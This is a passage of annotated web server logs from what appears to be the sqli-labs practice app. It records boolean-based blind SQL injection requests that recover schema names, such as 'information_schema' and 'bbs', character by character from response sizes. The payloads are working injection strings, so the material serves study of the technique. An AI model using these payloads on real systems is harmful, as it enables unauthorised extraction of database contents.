10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>120 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>116 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>114 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>115 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
i
# chr(105)='i'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>106 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),9,1))>105 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(111)='o'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),10,1))>111 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(110)='n'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),11,1))>109 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750

# chr(95)='_'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>48 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>72 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>84 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>90 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>93 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>94 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),12,1))>95 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(115)='s'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>64 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>120 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>116 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>114 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),13,1))>115 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(99)='c'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>98 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),14,1))>99 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(104)='h'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>102 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),15,1))>103 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750

# chr(101)='e'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>102 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),16,1))>101 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(109)='m'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),17,1))>109 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(97)='a'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>98 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),18,1))>97 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# > 1 都报错了 这个第19位不存在
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),19,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),19,1))>48 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),19,1))>1 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

bbs 数据库

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>64 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>96 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>112 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>104 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>100 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>98 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),1,1))>97 AND 'xFZw'='xFZw HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>96 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>112 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>104 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>100 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>98 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),2,1))>97 AND 'xFZw'='xFZw HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>96 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>112 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>120 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>116 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>114 AND 'xFZw'='xFZw HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),3,1))>115 AND 'xFZw'='xFZw HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),4,1))>96 AND 'xFZw'='xFZw HTTP/1.1" 200 670
